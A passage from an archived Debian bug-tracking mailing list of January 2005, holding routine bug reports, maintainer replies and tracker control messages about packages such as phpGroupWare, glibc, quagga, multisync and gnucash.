ii  libosip2feature209 [libo 2.0.9-2 Session Initiation Protocol (SIP) 

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292249: phpgroupware-todo: Todo Pasor Error

2005-01-28 Thread Dave Hall
On Fri, 2005-01-28 at 08:40 -0800, Brent Cordis wrote:
> Thomas Viehmann wrote ..
> > Hi Brent.
> > 
> > Thank you for your interest in phpGroupWare and your bug reports.
> > 
> > Brent Cordis wrote:
> > [mails without a message body and no attachments]
> > 
> > Would you mind to expand on the nature of the problem you're 
> > experiencing and the patch, please?
> > I'm afraid that I have to admit having trouble undestanding the
> bugs 
> > you're reporting given the information in your initial reports.
> > 
> > Also note that phpGroupWare for woody is in very deep maintenance
> ("we
> > only fix security bugs and only the more severe ones") mode. If you
> care
> > to look at newer packages, please have a peek at the phpGroupWare
> web 
> > site, they do provide newer Debian packages for woody.
> > 
> > Kind regards
> > 
> > Thomas
> > 
> > P.S.: Please amend the bug reports seperately by mailing
> > 292249 and 292250 at bugs.debian.org. You fi nd an archive of your
> bug 
> > reports at
> > http://bugs.debian.org/292249
> > and
> > http://bugs.debian.org/292250
> > 
> > -- 
> > Thomas Viehmann, Debian phpGroupWare maintainer, 
> > 
> Package: phpgroupware-todo
> Version: 0.9.14-0.RC3.2.woody3
> Severity: critical
> Tags: patch
> Justification: breaks unrelated software
> 
> -- System Information
> Debian Release: 3.0
> Architecture: i386
> Kernel: Linux sv01 2.4.19 #2 SMP Mon Jan 17 18:27:03 CST 2005 i686
> Locale: LANG=C, LC_CTYPE=C
> Versions of packages phpgroupware-todo depends on:
> ii  phpgroupware   0.9.14-0.RC3.2.woody3 Web based GroupWare
> system written
> -- User Info
> Brent Cordis
> IT Administartor
> South Nashville SDA Church
> [EMAIL PROTECTED]
> Patch=http://it.southnashvillesda.org/bug/class.ui.inc.php.text
> Original=http://it.southnashvillesda.org/bug/class.ui.inc.php-old.txt
> Error accord in line 486= "if ($values['edate'] && $values[''edate] !=
> 0)"
> Patch="if ($values['edate'] && $values['edate'] != 0)"
> Hope This Explanes a Litel Better What I did I just Edeted the Text in
> the php file.
> Hope you can do sumting about it but I can only run Stabel softwar on
> this server.

If you want to use stable software - 0.9.16 is way more stable than
0.9.14 ever was.  Grab a set of debs from download.phpgroupware.org/debs
and throw them on a test box and you will see what i mean.

Cheers

Dave
-- 
Dave Hall (aka skwashd)
API Coordinator
phpGroupWare
-
Do you think if Bill Gates got laid in high school, do you think there'd 
be a Microsoft?  Of course not.
Underwear Goes Inside The Pants by Lazy Boy



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292690: quagga - postinst script overwrites permissions in /etc

2005-01-28 Thread Bastian Blank
Package: quagga
Version: 0.98.0-3
Severity: serious

The postinstall script overwrites permissions in /etc. This overwrite
local configuration.

Bastian

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.4.26-wavehammer-1
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=UTF-8)
-- 
Punishment becomes ineffective after a certain point.  Men become insensitive.
-- Eneg, "Patterns of Force", stardate 2534.7


signature.asc
Description: Digital signature


Processed: reupping severity as this is not yet fixed.

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 285135 grave
Bug#285135: swf-player: Eats all CPU time and freezes galeon when various pages 
are opened simultaneously.
Severity set to `grave'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292678: libmultisync-plugin-opie: multisync fails to get opie plugin changes - though ftp seems to be OK

2005-01-28 Thread jochen issing
Package: libmultisync-plugin-opie
Version: 0.82-5
Severity: grave
Justification: renders package unusable

Hi,

I configured the poie plugin correctly and tried it with both sftp and
ftp. Ethereal says this:
220 Qtopia 1.1.7 FTP Server
USER root

331 User name ok, need password
PASS rootme

230 User logged in, proceed
PWD

257 "/"
CWD Applications

250 Requested file action okay, completed
CWD addressbook

250 Requested file action okay, completed
EPSV

502 Command not implemented
PASV

227 Entering Passive Mode (192,168,129,2,4,8)
TYPE I

200 Command okay
SIZE addressbook.xml

213 104454
RETR addressbook.xml

150 File status okay
226 Closing data connection, file transfer successful
QUIT

211 Good bye!

Hence, the connection seems to be OK. Looks like as if multisync has
problems with the xml files?

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (990, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages libmultisync-plugin-opie depends on:
ii  libart-2.0-2 2.3.17-1Library of functions for 2D graphi
ii  libatk1.0-0  1.8.0-4 The ATK accessibility toolkit
ii  libbonobo2-0 2.8.0-4 Bonobo CORBA interfaces library
ii  libbonoboui2-0   2.8.0-2 The Bonobo UI library
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libcurl3 7.12.3-2Multi-protocol file transfer libra
ii  libexpat11.95.8-1XML parsing C library - runtime li
ii  libgconf2-4  2.8.1-4 GNOME configuration database syste
ii  libglib2.0-0 2.6.1-3 The GLib library of C routines
ii  libgnome2-0  2.8.0-6 The GNOME 2 library - runtime file
ii  libgnomecanvas2-02.8.0-1 A powerful object-oriented display
ii  libgnomeui-0 2.8.0-3 The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0   2.8.3-9 The GNOME virtual file-system libr
ii  libgtk2.0-0  2.4.14-2The GTK+ graphical user interface 
ii  libice6  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  liborbit21:2.10.2-1.1libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-01.6.0-3 Layout and rendering of internatio
ii  libpopt0 1.7-5   lib for parsing cmdline parameters
ii  libsm6   4.3.0.dfsg.1-10 X Window System Session Management
ii  libssl0.9.7  0.9.7e-3SSL shared libraries
ii  libxml2  2.6.11-5GNOME XML library
ii  multisync0.82-5  A program to synchronize PIM data
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-4   compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292673: NPTL vs. LinuxThread sizeof(struct pthread) conflict causes memory corruption

2005-01-28 Thread dann frazier
Package: glibc
Severity: grave
Tags: sarge

On Fri, 2005-01-28 at 09:48 -0800, David Mosberger wrote:
> Hi Dann,
> 
> I don't seem to be getting much traction in getting the NPTL ld.so bug
> resolved.  I posted a glibc bug-report:
> 
>  http://sources.redhat.com/bugzilla/show_bug.cgi?id=685



Several of us noticed that evolution on Debian/unstable sometimes
crashes early
during program startup.  It turns out that the crash is due to memory
corruption.  In one particular case, the memory that got corrupted was in the
address range:

 0x22daff10-0x22daff1f

which happened to hold the function descriptors for shared library linkage stubs
("jump slots").  Of relevance was that the thread-pointer (r13) had the value:

 0x22db0500

The corruption was caused by any NPTL routine trying to access the
thread-descriptor, since NPTL uses a "struct pthread" of size 1680 bytes 
(0x690).

I believe the problem is due to the fact that /lib/ld-linux-ia64.so.2 was built
for Linux Threads, which uses a thread descriptor size of 0x500.  Note that
sysdeps/generic/dl-tls.c has several references to TLS_PRE_TCB_SIZE for the case
where TLS_DTV_AT_TP is defined.  In other words, ld.so ends up having a
dependency on the size of the thread-descriptor.  Sure enough, if I invoke
evolution like this:

  /lib/tls/ld-linux-ia64.so.2 evolution

it works just fine.

My understanding is that /lib/ld-linux-ia64.so.2 should work for both NPTL and
LinuxThreads libraries and the dependency on the size of the thread-descriptor
is accidental.

I believe this same bug may affect Alpha, PowerPC, and SH.

For Alpha, I found this bug report, which sounds potentially related:

  http://sources.redhat.com/bugzilla/show_bug.cgi?id=299

> 
> and sent a mail to libc-hacker:
> 
>  http://sources.redhat.com/ml/libc-hacker/2005-01/msg00071.html
> 
> and there has been no response whatsoever so far.  I'm not sure what
> the original authors had in mind here, so I'm not sure what the proper
> way is to fix this problem.
> 
> A stop-gap solution might be to just do:
> 
>   # mv /lib/tls/ld-2.3.2.so /lib/
> 
> I did this on my Debian/unstable system and it seems to work just
> fine.  I did verify beforehand that the two versions of ld-2.3.2 do
> export the exact same set of symbols, so this ought to be fairly safe.
> It works around the bug since the NPTL value of TLS_PRE_TCB_SIZE is
> bigger than that for LinuxThreads.
> 
> Perhaps this should be the recommended workaround for Debian for the
> time being?

I'm CC'ing Al Stone - maybe he has a suggestion with how to interact w/
glibc upstream, or what the proper fix may be.  I'm filing this bug as
release critical, given it causes memory corruption on potentially 4
architectures.  If the glibc maintainers disagree, I'm sure they'll
downgrade.





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 292669 is normal

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.8.5
> severity 292669 normal
Bug#292669: RM: cdindex-client -- RoM; obsolete
Severity set to `normal'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#287124: pftp conflicts with ftp

2005-01-28 Thread Michel Casabona

The conflict was solved at file level but apt-get still insists to remove
ftp or ftp-ssl on install/upgrade as the pftp package conflicts with
both packages though it doesn't seem required anymore.

Thanks.

--
Michel Casabona



Processed: Re: Not RC

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 207864 serious
Bug#207864: libhttpfetcher: Sometimes FTBFS due to time stamp skew and 
`missing' not being executable
Severity set to `serious'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 288796 to cdindex-client, cloning 288796, reassign -1 to ftp.debian.org ...

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.8.5
>  # don't let this get back to sarge
> reassign 288796 cdindex-client
Bug#288796: cdindex-client: cdindex refers to non-existent URL - is this 
package obsolete?
Bug reassigned from package `ftp.debian.org' to `cdindex-client'.

>  # this is the correct way
> clone 288796 -1
Bug#288796: cdindex-client: cdindex refers to non-existent URL - is this 
package obsolete?
Bug 288796 cloned as bug 292669.

> reassign -1 ftp.debian.org
Bug#292669: cdindex-client: cdindex refers to non-existent URL - is this 
package obsolete?
Bug reassigned from package `cdindex-client' to `ftp.debian.org'.

> retitle -1 RM: cdindex-client -- RoM; obsolete
Bug#292669: cdindex-client: cdindex refers to non-existent URL - is this 
package obsolete?
Changed Bug title.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#236060: marked as done (x10: Please rebuild with g++3.3)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 12:17:18 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#236060: fixed in x10 1.06-8
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 4 Mar 2004 00:17:47 +
>From [EMAIL PROTECTED] Wed Mar 03 16:17:47 2004
Return-path: <[EMAIL PROTECTED]>
Received: from ms-smtp-02.nyroc.rr.com [24.24.2.56] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1AygYd-000788-00; Wed, 03 Mar 2004 16:17:47 -0800
Received: from doctormoo (syr-24-59-96-153.twcny.rr.com [24.59.96.153])
by ms-smtp-02.nyroc.rr.com (8.12.10/8.12.10) with ESMTP id 
i240HiEj027776;
Wed, 3 Mar 2004 19:17:45 -0500 (EST)
Received: by doctormoo (Postfix, from userid 1000)
id D9820454BA; Wed,  3 Mar 2004 19:17:49 -0500 (EST)
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Nathanael Nerode <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: x10: Please rebuild with g++3.3
X-Mailer: reportbug 2.48
Date: Wed, 03 Mar 2004 19:17:49 -0500
Message-Id: <[EMAIL PROTECTED]>
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_01 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-5.0 required=4.0 tests=HAS_PACKAGE autolearn=no 
version=2.60-bugs.debian.org_2004_03_01
X-Spam-Level: 

Package: x10
Severity: important

This is one of the few packages which still hasn't undergone the 'c102'
transition, and accordingly depends on obsolete versions of libstdc++.

P.S.
While you're uploading a new source to fix this, you might like to fix
your Lintian warnings and errors as well (most of them are trivial to fix):
http://lintian.debian.org/reports/mMark_W._Eichin.html#x10

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing'), (90, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.3ncn1
Locale: LANG=C, LC_CTYPE=C


---
Received: (at 236060-close) by bugs.debian.org; 28 Jan 2005 17:23:02 +
>From [EMAIL PROTECTED] Fri Jan 28 09:23:01 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuZpl-0008TJ-00; Fri, 28 Jan 2005 09:23:01 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1CuZkE-p2-00; Fri, 28 Jan 2005 12:17:18 -0500
From: Luk Claes <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#236060: fixed in x10 1.06-8
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 28 Jan 2005 12:17:18 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Source: x10
Source-Version: 1.06-8

We believe that the bug you reported is fixed in the latest version of
x10, which is due to be installed in the Debian FTP archive:

x10_1.06-8.diff.gz
  to pool/main/x/x10/x10_1.06-8.diff.gz
x10_1.06-8.dsc
  to pool/main/x/x10/x10_1.06-8.dsc
x10_1.06-8_i386.deb
  to pool/main/x/x10/x10_1.06-8_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luk Claes <[EMAIL PROTECTED]> (supplier of updated x10 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 27 Jan 2005 19:12:07 +0100
Source: x10
Binary: x10
Architecture: source i386
Version: 1.06-8
Distribution: unstable
Urgency: low
Maintainer: Debian QA Group <[EMAIL PROTECTED]>
Changed-By: Luk Claes <[EMAIL PROTECTED]>
Description: 
 x10- operate X-10 electrical power control modules
Closes: 236060
Changes: 
 x10 (1.06-8) unstable; urgency=low
 .
   * Debian QA G

Bug#278410: Bug#278411 and Bug#278410: SchoolBell and SchoolTool should not be released with sarge

2005-01-28 Thread Brian Sutherland
The status of these bugs have changed, partial database upgrades will be
available from 0.8 to 1.0 and full upgrades thereafter.

However, I still consider SchoolBell/SchoolTool unsuitable for release
with sarge as the packages contain a large amount of a current checkout
of the zope 3 trunk.

The inclusion of these libraries will make security bugfix support
difficult, if not impossible.

-- 
Brian Sutherland

It's 10 minutes, 5 if you walk fast.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#278967: marked as done (libdbd-anydata-perl: FTBFS: Makefile problems)

2005-01-28 Thread Debian Bug Tracking System
Your message dated Fri, 28 Jan 2005 17:53:34 +0100
with message-id <[EMAIL PROTECTED]>
and subject line NMU acknowledged in libdbd-any-data-perl 0.08-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 30 Oct 2004 17:25:26 +
>From [EMAIL PROTECTED] Sat Oct 30 10:25:26 2004
Return-path: <[EMAIL PROTECTED]>
Received: from granger.mail.mindspring.net [207.69.200.148] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CNwyi-0003CO-00; Sat, 30 Oct 2004 10:25:24 -0700
Received: from user-119bq03.biz.mindspring.com ([66.149.232.3] 
helo=frobnitz.homelinux.net)
by granger.mail.mindspring.net with esmtp (Exim 3.33 #1)
id 1CNwyi-iP-00
for [EMAIL PROTECTED]; Sat, 30 Oct 2004 13:25:24 -0400
Received: from daniel by frobnitz.homelinux.net with local (Exim 4.34)
id 1CNwyh-00088Z-NZ
for [EMAIL PROTECTED]; Sat, 30 Oct 2004 10:25:23 -0700
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: libdbd-anydata-perl: FTBFS: Makefile problems
From: Daniel Schepler <[EMAIL PROTECTED]>
Date: Sat, 30 Oct 2004 10:25:23 -0700
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: Daniel Schepler <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level: 

Package: libdbd-anydata-perl
Severity: serious
Version: 0.08-1

>From my build log:

...
 fakeroot debian/rules clean
dh_testdir
dh_testroot
[ ! -f Makefile ] || /usr/bin/make realclean
make[1]: Entering directory `/tmp/buildd/libdbd-anydata-perl-0.08'
Makefile out-of-date with respect to /usr/lib/perl/5.8/Config.pm 
/usr/lib/perl/5.8/CORE/config.h
Cleaning current config before rebuilding Makefile...
/usr/bin/make -f Makefile.old clean > /dev/null 2>&1 || /bin/sh -c true
/usr/bin/perl Makefile.PL "INSTALLDIRS=vendor"
Checking if your kit is complete...
Looks good
Warning: prerequisite SQL::Statement 1 not found. We have 0.1021.
Writing Makefile for DBD::AnyData
==> Your Makefile has been rebuilt. <==
==> Please rerun the make command.  <==
false
make[1]: *** [Makefile] Error 1
make[1]: Leaving directory `/tmp/buildd/libdbd-anydata-perl-0.08'
make: *** [clean] Error 2

-- 
Daniel Schepler  "Please don't disillusion me.  I
[EMAIL PROTECTED]haven't had breakfast yet."
 -- Orson Scott Card

---
Received: (at 278967-done) by bugs.debian.org; 28 Jan 2005 16:53:40 +
>From [EMAIL PROTECTED] Fri Jan 28 08:53:40 2005
Return-path: <[EMAIL PROTECTED]>
Received: from asia.telenet-ops.be [195.130.132.59] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuZNM-0002Hi-00; Fri, 28 Jan 2005 08:53:40 -0800
Received: from localhost (localhost.localdomain [127.0.0.1])
by asia.telenet-ops.be (Postfix) with SMTP id 96D4F22420E
for <[EMAIL PROTECTED]>; Fri, 28 Jan 2005 17:53:38 +0100 (MET)
Received: from [213.118.110.233] (dD5766EE9.access.telenet.be [213.118.110.233])
by asia.telenet-ops.be (Postfix) with ESMTP id 5D10D224244
for <[EMAIL PROTECTED]>; Fri, 28 Jan 2005 17:53:38 +0100 (MET)
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 28 Jan 2005 17:53:34 +0100
From: Luk Claes <[EMAIL PROTECTED]>
User-Agent: Debian Thunderbird 1.0 (X11/20050116)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: NMU acknowledged in libdbd-any-data-perl 0.08-2
X-Enigmail-Version: 0.90.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-1.4 required=4.0 tests=BAYES_00,UPPERCASE_25_50 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi

I acknowledged the NMU in my last upload, but forgot to mention it in
the changelog.

Cheers

Luk


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+m4O5UTeB5t8Mo0RAkbHAJ92Qn03Bgx8lxZPy/23meUqw7OLgQCeJgBG
UoMdj0MV5SVZOR8Gh5M963g=
=+QF5
-END PGP SIGNATURE-


Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images

2005-01-28 Thread Jesus Climent
On Fri, Jan 28, 2005 at 11:54:08AM +0100, Matthias Urlichs wrote:
> Hi,
> 
> > On second notice, the templates have been modified to change this to
> > /gallery-icons. Doing this is not a good idea, as it will break all
> > existing installs of Apache::Gallery, and furthermore, the source
> > hasn't been modified to decline gallery-icons appropriately.
> > 
> True. :-/

Already reverted. As soon as I get out of the firewall at work I will upload
the packages.

-- 
Jesus Climent  info:www.pumuki.org
Unix SysAdm|Linux User #66350|Debian Developer|2.6.10|Helsinki Finland
GPG: 1024D/86946D69 BB64 2339 1CAA 7064 E429  7E18 66FC 1D7F 8694 6D69

He's almost a stranger, and I prefer him to you!
--Sandra Bloom (Big Fish)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#291500: Builds for me...?

2005-01-28 Thread Wesley W. Terpstra
tags 291500 +unreproducible +moreinfo
thanks

I installed a clean chroot and then only did 'apt-get build-dep cryptsetup'
and then the package built correctly. It also built on every other
architecture but arm, and apparently on debussy too.

Can you provide me with more information so I can reproduce this?

-- 
Wesley W. Terpstra


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292249: phpgroupware-todo: Todo Pasor Error

2005-01-28 Thread Brent Cordis
Thomas Viehmann wrote ..> Hi Brent.> > Thank you for your interest in phpGroupWare and your bug reports.> > Brent Cordis wrote:> [mails without a message body and no attachments]> > Would you mind to expand on the nature of the problem you're > experiencing and the patch, please?> I'm afraid that I have to admit having trouble undestanding the bugs > you're reporting given the information in your initial reports.> > Also note that phpGroupWare for woody is in very deep maintenance ("we> only fix security bugs and only the more severe ones") mode. If you care> to look at newer packages, please have a peek at the phpGroupWare web > site, they do provide newer Debian packages for woody.> > Kind regards> > Thomas> > P.S.: Please amend the bug reports seperately by mailing> 292249 and 292250 at bugs.debian.org. You find an
 archive of your bug > reports at> http://bugs.debian.org/292249> and> http://bugs.debian.org/292250> > -- > Thomas Viehmann, Debian phpGroupWare maintainer, > Package: phpgroupware-todoVersion: 0.9.14-0.RC3.2.woody3Severity: criticalTags: patchJustification: breaks unrelated software
-- System InformationDebian Release: 3.0Architecture: i386Kernel: Linux sv01 2.4.19 #2 SMP Mon Jan 17 18:27:03 CST 2005 i686Locale: LANG=C, LC_CTYPE=C
Versions of packages phpgroupware-todo depends on:ii  phpgroupware   0.9.14-0.RC3.2.woody3 Web based GroupWare system written
-- User InfoBrent CordisIT AdministartorSouth Nashville SDA Church[EMAIL PROTECTED]
Patch=http://it.southnashvillesda.org/bug/class.ui.inc.php.textOriginal=http://it.southnashvillesda.org/bug/class.ui.inc.php-old.txt
Error accord in line 486= "if ($values['edate'] && $values[''edate] != 0)"Patch="if ($values['edate'] && $values['edate'] != 0)"
Hope This Explanes a Litel Better What I did I just Edeted the Text in the php file.
Hope you can do sumting about it but I can only run Stabel softwar on this server.
Brent CordisIT AdministratorBrent C. CordisSouth Nashville SDA Church Tec Team300 Bakertown Rd.Antioch, TN 37013 Work: 615-425-0282 ext# 203Fax: 615-425-0283E-mail: [EMAIL PROTECTED]
		Do you Yahoo!? 
Yahoo! Mail - Easier than ever with enhanced search. Learn more.

Bug#292569: kdelibs-data: conflicts with openoffic.org

2005-01-28 Thread Christopher Martin
tags 292569 confirmed pending
stop

On January 27, 2005 17:25, Robert Waldner wrote:
> Whilst installing amarok, I encountered the following error:
>
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: error processing
> /var/cache/apt/archives/kdelibs-data_4%3a3.3.2-1_all.deb (--unpack):
>  trying to overwrite
>  `/usr/share/mimelnk/application/vnd.sun.xml.calc.desktop', which is
>  also in package openoffice.org
>
> Installed is openoffice.org 1.0.3-2, on a mixed stable/testing/unstable
> system.

The next upload of kdelibs will add Conflicts/Replaces against old 
versions of openoffice.org, in order to avoid problems such as you are 
encountering.

Cheers,
Christopher Martin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#292569: kdelibs-data: conflicts with openoffic.org

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 292569 confirmed pending
Bug#292569: kdelibs-data: conflicts with openoffic.org
There were no tags set.
Tags added: confirmed, pending

> stop
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Builds for me...?

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 291500 +unreproducible +moreinfo
Unknown tag/s: +moreinfo.
Recognized are: patch wontfix moreinfo unreproducible fixed potato woody sid 
help security upstream pending sarge sarge-ignore experimental d-i confirmed 
ipv6 lfs fixed-in-experimental fixed-upstream l10n.

Bug#291500: cryptsetup_20050111-2(arm): FTBS
Tags were: sid
Tags added: unreproducible

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Please, remove cdindex-client from the archive (unstable/testing)

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> reassign 288796 ftp.debian.org
Bug#288796: cdindex-client: cdindex refers to non-existent URL - is this 
package obsolete?
Bug reassigned from package `cdindex-client' to `ftp.debian.org'.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292130: gnucash: New Bill also causes system to crash

2005-01-28 Thread Russell Sutherland
Package: gnucash
Version: 1.8.10-3
Followup-For: Bug #292130


As well as crashing upon creating a new Invoice, gnucash/unstable
crashes at the point when the system goes to create a new Bill
(after the Vendor has been selected) with the following error
message:

/usr/bin/guile-1.6: relocation error:
/usr/lib/gnucash/gnucash/libgnc-business-ledger.so.0: undefined symbol:
gnc_option_db_loo kup_taxtable_option

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.26.2004091501
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages gnucash depends on:
ii  bonobo   1.0.22-2.2  The GNOME Bonobo System.
ii  gdk-imlib1   1.9.14-16.2 imaging library for use with gtk (
ii  gnucash-common   1.8.10-3A personal finance tracking progra
ii  guile-1.6-libs   1.6.7-1 Main Guile libraries
ii  guile-1.6-slib   1.6.7-1 Guile SLIB support
ii  libart2  1.4.2-19The GNOME canvas widget - runtime 
ii  libaudiofile00.2.6-5 Open-source version of SGI's audio
ii  libbonobo2   1.0.22-2.2  The GNOME Bonobo library.
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libdate-manip-perl   5.42a-2 a perl library for manipulating da
